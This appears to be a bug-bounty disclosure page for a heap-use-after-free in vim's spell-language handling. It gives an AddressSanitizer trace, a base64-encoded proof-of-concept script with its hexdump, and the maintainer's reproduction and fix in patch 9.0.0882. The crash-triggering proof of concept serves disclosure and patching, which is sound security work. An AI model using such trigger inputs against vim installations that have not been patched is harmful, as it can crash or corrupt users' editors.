heap-use-after-free in function did_set_spelllang at spell in vim/vim

Valid

Reported on

Oct 30th 2022


Description

heap-use-after-free in function did_set_spelllang at spell.c:2256:19

vim version

git log -1
commit 03d6e6f42b0deeb02d52c8a48c14abe431370c1c (HEAD -> master, tag: v9.0.0820, origin/master, origin/HEAD)

Impact

Proof of Concept

# ~/vim/src/vim -u NONE -X -Z -e -s -S ./poc3 -c ':qa!'
=================================================================
==19583==ERROR: AddressSanitizer: heap-use-after-free on address 0x62500000a120 at pc 0x55ab5727e6b4 bp 0x7ffe2878da30 sp 0x7ffe2878da28
READ of size 8 at 0x62500000a120 thread T0
    #0 0x55ab5727e6b3 in did_set_spelllang /root/vim/src/spell.c:2256:19
    #1 0x55ab56db52d2 in do_ecmd /root/vim/src/ex_cmds.c:3122:8
    #2 0x55ab56bd56f9 in do_argfile /root/vim/src/arglist.c:738:6
    #3 0x55ab56dd2de9 in do_one_cmd /root/vim/src/ex_docmd.c:2578:2
    #4 0x55ab56dd2de9 in do_cmdline /root/vim/src/ex_docmd.c:990:17
    #5 0x55ab57226f23 in do_source_ext /root/vim/src/scriptfile.c:1667:5
    #6 0x55ab57224b94 in do_source /root/vim/src/scriptfile.c:1811:12
    #7 0x55ab57224b94 in cmd_source /root/vim/src/scriptfile.c:1163:14
    #8 0x55ab56dd2de9 in do_one_cmd /root/vim/src/ex_docmd.c:2578:2
    #9 0x55ab56dd2de9 in do_cmdline /root/vim/src/ex_docmd.c:990:17
    #10 0x55ab575ef049 in exe_commands /root/vim/src/main.c:3135:2
    #11 0x55ab575ef049 in vim_main2 /root/vim/src/main.c:781:2
    #12 0x55ab575ec33b in main /root/vim/src/main.c:432:12
    #13 0x7f4485981d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
    #14 0x7f4485981e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
    #15 0x55ab56b0c264 in _start (/root/vim/src/vim+0x1c6264) (BuildId: cc93689526cbfb3ad5bf5cb56efb76f0ae814d34)

0x62500000a120 is located 32 bytes inside of 9168-byte region [0x62500000a100,0x62500000c4d0)
freed by thread T0 here:
    #0 0x55ab56b8ee02 in free (/root/vim/src/vim+0x248e02) (BuildId: cc93689526cbfb3ad5bf5cb56efb76f0ae814d34)
    #1 0x55ab56be30f1 in apply_autocmds_group /root/vim/src/autocmd.c:2300:6
    #2 0x55ab56be5e23 in apply_autocmds /root/vim/src/autocmd.c:1710:12
    #3 0x55ab56db52d2 in do_ecmd /root/vim/src/ex_cmds.c:3122:8
    #4 0x55ab56bd56f9 in do_argfile /root/vim/src/arglist.c:738:6

previously allocated by thread T0 here:
    #0 0x55ab56b8f0ae in __interceptor_malloc (/root/vim/src/vim+0x2490ae) (BuildId: cc93689526cbfb3ad5bf5cb56efb76f0ae814d34)
    #1 0x55ab56bca2b8 in lalloc /root/vim/src/alloc.c:246:11

SUMMARY: AddressSanitizer: heap-use-after-free /root/vim/src/spell.c:2256:19 in did_set_spelllang
Shadow bytes around the buggy address:
  0x0c4a7fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff9410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff9420: fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9430: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9440: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9450: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9460: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9470: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==19583==ABORTING

Content of poc3 (base64 encoded):

YXUgU3BlbGxGaWxlTWlzc2luZyAqIG4wCnNlIHNwZWxsCmF1IFNwZWxsRmlsZU1pc3NpbmcgKiBi
dwpzbus=

Impact

This vulnerability is capable of crashing software, modify memory, and possible remote execution.

Report of the Information Security Laboratory of Ocean University of China @OUC_ISLOUC @OUC_Blue_Whale

We are processing your report and will contact the vim team within 24 hours. a year ago
We have contacted a member of the vim team and are waiting to hear back a year ago
We have sent a follow up to the vim team. We will try again in 4 days. a year ago
We have sent a second follow up to the vim team. We will try again in 7 days. a year ago
Bram Moolenaar
a year ago

Maintainer


I tried with valgrind, but I cannot reproduce the problem. Is it correct that the last bytes in the POC file are: 0a73 6eeb ? It ends in an illegal byte, I doubt that matters for reproducing the problem.

ex7l0it
a year ago

Researcher


Yes, the POC does end with those bytes.

$ hexdump poc
0000000 7561 5320 6570 6c6c 6946 656c 694d 7373
0000010 6e69 2067 202a 306e 730a 2065 7073 6c65
0000020 0a6c 7561 5320 6570 6c6c 6946 656c 694d
0000030 7373 6e69 2067 202a 7762 730a eb6e     
000003e

I can still reproduce the latest version(commit cf2594fbf34d9a6776bd9d33f845cb8ceb1e1cd0). These are the output logs of valgrind and AFL++:

These pocs can also reproduce this problem: vim-pocs-3.tar.gz

Bram Moolenaar
a year ago

Maintainer


I managed to reproduce by adding this line at the top of the POC: set spelllang=xy

Bram Moolenaar
a year ago

Maintainer


Fixed with patch 9.0.0882

Bram Moolenaar validated this vulnerability a year ago
ex7l0it has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Bram Moolenaar marked this as fixed in 9.0.0882 with commit c3d27a a year ago
Bram Moolenaar has been awarded the fix bounty
ex7l0it
a year ago

Researcher


Can't this issue be assigned a CVE-ID?

This vulnerability has now been published a year ago
Mark Esler
a year ago

@Pavlos, why are the recent vim bugs that marked as "This vulnerability will not receive a CVE" receiving CVEs?

Did Bram label these as bugs and not a security vulnerabilities? If so, giving a non-security bug a CVE is inappropriate.

to join this conversation